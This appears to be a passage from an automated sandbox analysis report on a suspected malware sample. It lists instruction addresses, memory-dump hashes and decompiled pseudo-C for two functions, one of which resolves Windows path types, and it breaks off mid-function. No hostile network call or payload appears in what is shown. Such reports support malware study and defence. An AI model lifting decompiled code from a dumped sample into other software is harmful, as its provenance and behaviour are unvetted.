            0x044f5d5a
            0x044f5d5d
            0x044f5d60
            0x00000000
            0x00000000
            0x044f5d66
            0x044f5d69
            0x00000000
            0x00000000
            0x044f5d6f
            0x044f5d6f
            0x044f5d73
            0x044f5d79
            0x044f5d7f
            0x044f5d86
            0x044f5d95
            0x044f5d98
            0x044f5dba
            0x044f5dcb
            0x044f5dce
            0x044f5dd3
            0x044f5dd6
            0x044f5dd8
            0x044f5de6
            0x044f5dec
            0x044f5dee
            0x044f5df1
            0x044f5df3
            0x044f635a
            0x044f635a
            0x00000000
            0x044f635a
            0x044f5dfe
            0x044f5e02
            0x044f5e05
            0x044f5e07
            0x044f5e10
            0x044f5e13
            0x044f5e1b
            0x044f5e1c
            0x044f5e21
            0x044f5e22
            0x044f5e23
            0x044f5e25
            0x044f5e2a
            0x044f5e2c
            0x044f5e2e
            0x044f5e36
            0x044f5e39
            0x044f5e42
            0x044f5e47
            0x044f5e4d
            0x044f5e54
            0x044f5e54
            0x044f5e54
            0x044f5e2e
            0x044f5e5c
            0x044f5e5f
            0x044f5e62
            0x044f5e64
            0x044f5e6b
            0x044f5e70
            0x044f5e7a
            0x044f5e7a
            0x044f5e7a
            0x044f5e6b
            0x044f5e7e
            0x044f5e7f
            0x044f5e7f
            0x044f5e81
            0x044f5e87
            0x044f5e8b
            0x044f5e8c
            0x044f5e8c
            0x044f5e8c
            0x044f5e9a
            0x044f5e9c
            0x044f5ea2
            0x044f5ea6
            0x044f5f50
            0x044f5f50
            0x044f5f57
            0x044f5f66
            0x044f5f66
            0x044f5f66
            0x044f5f68
            0x044f5f6a
            0x044f63d0
            0x00000000
            0x044f5f70
            0x044f5f70
            0x044f5f91
            0x044f5f9c
            0x044f5f9e
            0x044f5fa4
            0x044f5fa6
            0x044f638c
            0x044f6392
            0x044f63a1
            0x044f63a7
            0x044f63af
            0x044f63af
            0x044f63bd
            0x044f63d8
            0x00000000
            0x044f63d8
            0x044f5fac
            0x044f5fb2
            0x044f5fb4
            0x044f5fbd
            0x044f5fc6
            0x044f5fce
            0x044f5fd4
            0x044f5fdc
            0x044f5fec
            0x044f5fed
            0x044f5fee
            0x044f5fef
            0x044f5ff9
            0x044f5ffa
            0x044f5ffb
            0x044f5ffc
            0x044f6000
            0x044f6004
            0x044f6012
            0x044f6012
            0x044f6018
            0x044f6019
            0x044f601a
            0x044f601b
            0x044f601c
            0x044f6020
            0x044f6059
            0x044f605c
            0x044f6061
            0x044f6061
            0x044f6022
            0x044f6022
            0x044f6022
            0x044f6025
            0x044f602a
            0x044f602b
            0x044f6031
            0x044f6037
            0x044f6038
            0x044f603e
            0x044f6048
            0x044f6049
            0x044f604a
            0x044f604b
            0x044f604c
            0x044f604d
            0x044f6053
            0x044f6054
            0x044f6054
            0x044f6062
            0x044f6065
            0x044f6067
            0x044f606a
            0x044f6070
            0x044f6075
            0x044f6076
            0x044f6081
            0x044f6087
            0x044f6095
            0x044f6099
            0x044f609e
            0x044f60a4
            0x044f60ae
            0x044f60b0
            0x044f60b3
            0x044f60b6
            0x044f60b8
            0x044f60ba
            0x044f60ba
            0x044f60ba
            0x044f60ba
            0x044f60be
            0x044f60c0
            0x044f60c5
            0x044f60c5
            0x044f60c5
            0x044f60c6
            0x044f60cd
            0x044f6114
            0x044f60cf
            0x044f60cf
            0x044f60d4
            0x044f60d5
            0x044f60da
            0x044f60db
            0x044f60e1
            0x044f60e2
            0x044f60e8
            0x044f60f8
            0x044f60fd
            0x044f60fe
            0x044f6102
            0x044f6104
            0x044f6107
            0x044f6109
            0x044f610b
            0x044f610b
            0x044f610b
            0x044f610b
            0x044f610f
            0x044f610f
            0x044f6117
            0x044f611a
            0x044f611f
            0x044f6125
            0x044f6134
            0x044f6139
            0x044f613f
            0x044f6146
            0x044f6148
            0x044f614b
            0x044f614d
            0x044f614f
            0x044f614f
            0x044f614f
            0x044f614f
            0x044f6153
            0x044f6159
            0x044f6159
            0x044f615c
            0x044f6163
            0x044f6169
            0x044f616c
            0x044f6172
            0x044f6181
            0x044f6186
            0x044f6187
            0x044f618b
            0x044f6191
            0x044f6195
            0x044f61a3
            0x044f61bb
            0x044f61c0
            0x044f61c3
            0x044f61cc
            0x044f61d0
            0x044f61dc
            0x044f61de
            0x044f61e1
            0x044f61e4
            0x044f61e6
            0x044f61e8
            0x044f61e8
            0x044f61e8
            0x044f61e8
            0x044f61e6
            0x044f61ec
            0x044f61f3
            0x044f6203
            0x044f6209
            0x044f620a
            0x044f6216
            0x044f621d
            0x044f6227
            0x044f6241
            0x044f6246
            0x044f624c
            0x044f6257
            0x044f6259
            0x044f625c
            0x044f625e
            0x044f6260
            0x044f6260
            0x044f6260
            0x044f6260
            0x044f625e
            0x044f6264
            0x044f6267
            0x044f6269
            0x044f6315
            0x044f6315
            0x044f631b
            0x044f631e
            0x044f6324
            0x044f6327
            0x044f632f
            0x044f6330
            0x044f6333
            0x044f633a
            0x044f633c
            0x044f6335
            0x044f6335
            0x044f6335
            0x044f633f
            0x044f6342
            0x044f634c
            0x044f6352
            0x044f6355
            0x044f6355
            0x044f6359
            0x00000000
            0x044f626f
            0x044f6275
            0x044f6275
            0x044f6278
            0x044f627e
            0x044f627e
            0x044f6281
            0x044f6287
            0x044f628d
            0x044f6298
            0x044f629c
            0x044f62a2
            0x044f629e
            0x044f629e
            0x044f629e
            0x044f62a7
            0x044f62a7
            0x044f62aa
            0x044f62b0
            0x044f62f0
            0x044f62f0
            0x044f62f2
            0x044f62f8
            0x044f62fd
            0x044f62b2
            0x044f62b2
            0x044f62b2
            0x044f62b5
            0x044f62dd
            0x044f62e2
            0x044f62e5
            0x044f62b7
            0x044f62b8
            0x044f62bb
            0x044f62bd
            0x044f62c0
            0x044f62c4
            0x044f62cd
            0x044f62cd
            0x044f62c0
            0x044f62bb
            0x044f62b5
            0x044f6302
            0x044f6303
            0x044f6305
            0x044f6305
            0x044f6305
            0x044f630c
            0x044f630c
            0x00000000
            0x044f627e
            0x044f6269
            0x044f5eac
            0x044f5ebb
            0x044f5ebe
            0x044f5ecb
            0x044f5ecb
            0x044f5ece
            0x044f5ece
            0x044f5ed4
            0x044f5ed7
            0x044f5ed9
            0x044f5edb
            0x044f5edb
            0x044f5ee1
            0x044f5ee1
            0x044f5ee3
            0x044f5f20
            0x044f5f20
            0x044f5ee5
            0x044f5ee5
            0x044f5ee5
            0x044f5ee8
            0x044f5f11
            0x044f5f18
            0x044f5eea
            0x044f5eea
            0x044f5eed
            0x044f5ef2
            0x044f5ef8
            0x044f5efb
            0x044f5f0a
            0x044f5f0a
            0x044f5eed
            0x044f5ee8
            0x044f5f22
            0x044f5f28
            0x00000000
            0x00000000
            0x044f5f30
            0x044f5f31
            0x044f5f37
            0x044f5f3a
            0x044f5f3d
            0x044f5f44
            0x00000000
            0x00000000
            0x00000000
            0x044f5f46
            0x044f5f48
            0x044f5f4d
            0x00000000
            0x044f5f4d
            0x044f5dda
            0x044f5ddf
            0x00000000
            0x044f5ddf
            0x044f5dd8
            0x044f5da7
            0x044f5da9
            0x044f5dac
            0x044f5dae
            0x00000000
            0x044f5db4
            0x044f5db4
            0x00000000
            0x044f5db4
            0x044f5dae
            0x044f5d88
            0x044f5d8d
            0x044f6363
            0x044f6369
            0x044f636a
            0x044f6370
            0x044f6372
            0x044f637a
            0x044f637b
            0x044f637d
            0x00000000
            0x00000000
            0x044f637f
            0x044f6385
            0x00000000
            0x044f6385
            0x044f5d38
            0x044f5d3b
            0x00000000
            0x00000000
            0x00000000
            0x044f5d3b
            0x044f5d27
            0x044f5d29
            0x00000000
            0x00000000
            0x00000000
            0x044f6360
            0x00000000
            0x044f6360
            0x044f5c10
            0x044f5c10
            0x044f63da
            0x044f63e5
            0x044f63e5

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4dada7773f2661de98c2028516dfa6c49f36f3a55e2a9761eb639e7652598ac9
            • Instruction ID: b9fe819c0fe8c813f683c6e6835225e612303d41cecc51cf4792344e232f52cb
            • Opcode Fuzzy Hash: 4dada7773f2661de98c2028516dfa6c49f36f3a55e2a9761eb639e7652598ac9
            • Instruction Fuzzy Hash: 26423C75A00219DFDB24CF68C980BAAB7B1FF45304F1581AAD94DAB342E735A986CF50
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04444120, Relevance: .4, Instructions: 444COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 92%
            			E04444120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x451d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0445F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E04446E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L04444620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E04446E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M044445F8))) {
												case 0:
													_v568 = 0x4401078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x44011c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L04444620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0446F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0446F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E044252A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0443EB70(1, 0x45179a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0443AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E044695D0();
																			L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0446B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E04463D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0446B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































            0x04444128
            0x04444135
            0x0444413c
            0x04444141
            0x04444145
            0x04444147
            0x0444414e
            0x04444151
            0x04444159
            0x0444415c
            0x04444160
            0x04444164
            0x04444168
            0x0444416c
            0x0444417f
            0x04444181
            0x0444446a
            0x0444446a
            0x0444418c
            0x04444195
            0x04444199
            0x04444432
            0x04444439
            0x0444443d
            0x04444442
            0x04444447
            0x00000000
            0x0444419f
            0x044441a3
            0x044441b1
            0x044441b9
            0x044441bd
            0x044445db
            0x044445db
            0x00000000
            0x044441c3
            0x044441c3
            0x044441ce
            0x044441d4
            0x0448e138
            0x0448e13e
            0x0448e169
            0x0448e16d
            0x0448e19e
            0x0448e16f
            0x0448e16f
            0x0448e175
            0x0448e179
            0x0448e18f
            0x0448e193
            0x00000000
            0x0448e199
            0x00000000
            0x0448e199
            0x0448e193
            0x00000000
            0x00000000
            0x00000000
            0x044441da
            0x044441da
            0x044441df
            0x044441e4
            0x044441ec
            0x04444203
            0x04444207
            0x0448e1fd
            0x04444222
            0x04444226
            0x0448e1f3
            0x0448e1f3
            0x0444422c
            0x0444422c
            0x04444233
            0x0448e1ed
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x04444239
            0x04444239
            0x04444239
            0x04444239
            0x04444233
            0x04444226
            0x044441ee
            0x044441ee
            0x044441f4
            0x04444575
            0x0448e1b1
            0x0448e1b1
            0x00000000
            0x0444457b
            0x0444457b
            0x04444582
            0x0448e1ab
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x04444588
            0x04444588
            0x0444458c
            0x0448e1c4
            0x0448e1c4
            0x00000000
            0x04444592
            0x04444592
            0x04444599
            0x0448e1be
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0444459f
            0x0444459f
            0x044445a3
            0x0448e1d7
            0x0448e1e4
            0x00000000
            0x044445a9
            0x044445a9
            0x044445b0
            0x0448e1d1
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x044445b6
            0x044445b6
            0x044445b6
            0x00000000
            0x044445b6
            0x044445b0
            0x044445a3
            0x04444599
            0x0444458c
            0x04444582
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x044441f4
            0x0444423e
            0x04444241
            0x044445c0
            0x044445c4
            0x00000000
            0x044445ca
            0x044445ca
            0x00000000
            0x0448e207
            0x0448e20f
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x044445d1
            0x00000000
            0x00000000
            0x044445ca
            0x00000000
            0x04444247
            0x04444247
            0x04444247
            0x04444249
            0x04444249
            0x04444249
            0x04444251
            0x04444251
            0x04444257
            0x0444425f
            0x0444426e
            0x04444270
            0x0444427a
            0x0448e219
            0x0448e219
            0x04444280
            0x04444282
            0x04444456
            0x044445ea
            0x00000000
            0x044445f0
            0x0448e223
            0x00000000
            0x0448e223
            0x0444445c
            0x0444445c
            0x00000000
            0x0444445c
            0x00000000
            0x04444288
            0x0444428c
            0x0448e298
            0x04444292
            0x04444292
            0x0444429e
            0x044442a3
            0x044442a7
            0x044442ac
            0x0448e22d
            0x044442b2
            0x044442b2
            0x044442b9
            0x044442bc
            0x044442c2
            0x044442ca
            0x044442cd
            0x044442cd
            0x044442d4
            0x0444433f
            0x0444433f
            0x044442d6
            0x044442d6
            0x044442d9
            0x044442dd
            0x044442eb
            0x0448e23a
            0x044442f1
            0x04444305
            0x0444430d
            0x04444315
            0x04444318
            0x0444431f
            0x04444322
            0x0444432e
            0x0444433b
            0x0444433b
            0x00000000
            0x0444432e
            0x044442eb
            0x0444434c
            0x0444434e
            0x04444352
            0x04444359
            0x0444435e
            0x04444361
            0x0444436e
            0x0444438a
            0x0444438e
            0x04444396
            0x0444439e
            0x044443a1
            0x044443ad
            0x044443bb
            0x044443bb
            0x044443ad
            0x0444436e
            0x044443bf
            0x044443c5
            0x04444463
            0x04444463
            0x044443ce
            0x044443d5
            0x044443d9
            0x044443df
            0x04444475
            0x04444479
            0x04444491
            0x04444491
            0x04444479
            0x044443e5
            0x044443eb
            0x044443f4
            0x044443f6
            0x044443f9
            0x044443fc
            0x044443ff
            0x044444e8
            0x044444ed
            0x044444f3
            0x0448e247
            0x00000000
            0x044444f9
            0x04444504
            0x04444508
            0x0444450f
            0x0448e269
            0x00000000
            0x04444515
            0x04444519
            0x04444531
            0x04444534
            0x04444537
            0x0444453e
            0x04444541
            0x0444454a
            0x0448e255
            0x0448e255
            0x0448e25b
            0x0448e25e
            0x0448e261
            0x0448e261
            0x04444555
            0x04444559
            0x0444455d
            0x0448e26d
            0x0448e270
            0x0448e274
            0x0448e27a
            0x0448e27d
            0x0448e28e
            0x0448e28e
            0x04444563
            0x04444563
            0x04444569
            0x04444569
            0x00000000
            0x0444455d
            0x0444450f
            0x00000000
            0x044444f3
            0x044443ff
            0x04444405
            0x04444405
            0x04444405
            0x044442ac
            0x0444428c
            0x04444282
            0x04444407
            0x0444440d
            0x0448e2af
            0x0448e2af
            0x04444413
            0x04444413
            0x00000000
            0x044441d4
            0x00000000
            0x044441c3
            0x044441bd
            0x04444415
            0x04444415
            0x04444416
            0x04444417
            0x04444429
            0x0444416e
            0x0444416e
            0x04444175
            0x04444498
            0x0444449f
            0x0448e12d
            0x00000000
            0x0448e133
            0x00000000
            0x0448e133
            0x044444a5
            0x044444a5
            0x044444aa
            0x00000000
            0x044444bb
            0x044444ca
            0x044444d6
            0x044444d7
            0x044444d8
            0x044444e3
            0x044444e3
            0x044444aa
            0x0444417b
            0x0444417b
            0x0444417b
            0x00000000
            0x0444417b
            0x04444175
            0x00000000

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6142da94e7eec412552e76bbf38a9abd65ee1a6a0881f758f02b62499ca8ffc1
            • Instruction ID: 919abce6dc4c6b4096cbe079f943ad85dd97c4ad3713b327cd5f24069aa09c61
            • Opcode Fuzzy Hash: 6142da94e7eec412552e76bbf38a9abd65ee1a6a0881f758f02b62499ca8ffc1
            • Instruction Fuzzy Hash: C6F14B706082518BEB24DF59C480A3BB7E1BF88758F14492FF886CB351E734E996DB52
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445513A, Relevance: .3, Instructions: 258COMMON
            Download Yara Rule
            C-Code - Quality: 67%
            			E0445513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x451d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0446D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
